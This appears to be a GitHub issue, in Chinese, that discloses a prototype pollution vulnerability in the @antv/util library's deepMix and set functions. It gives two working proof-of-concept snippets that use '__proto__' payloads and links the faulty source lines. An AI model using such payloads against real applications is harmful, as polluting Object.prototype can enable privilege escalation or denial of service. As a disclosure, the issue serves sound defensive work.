util 潜在的原型链污染漏洞

潜在的原型链污染漏洞

Open yllhwa opened this issue 9 months ago • 1 comments

复现代码1：

let deepMix = require("@antv/util").deepMix;

let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');

let obj = {};
deepMix(obj, BAD_JSON);

console.log({}.test); // 123

问题代码： https://github.com/antvis/util/blob/c499a30265ccf6099fc6e23d123f04b547eeaf5d/src/lodash/deep-mix.ts#L42-L47

复现代码2：

let set = require("@antv/util").set;

let obj = {};
set(obj, "__proto__.test", 123);

console.log({}.test); // 123

问题代码： https://github.com/antvis/util/blob/c499a30265ccf6099fc6e23d123f04b547eeaf5d/src/lodash/set.ts#L5-L29

May 22 '24 04:05 yllhwa

util util copied to clipboard

潜在的原型链污染漏洞

util
util copied to clipboard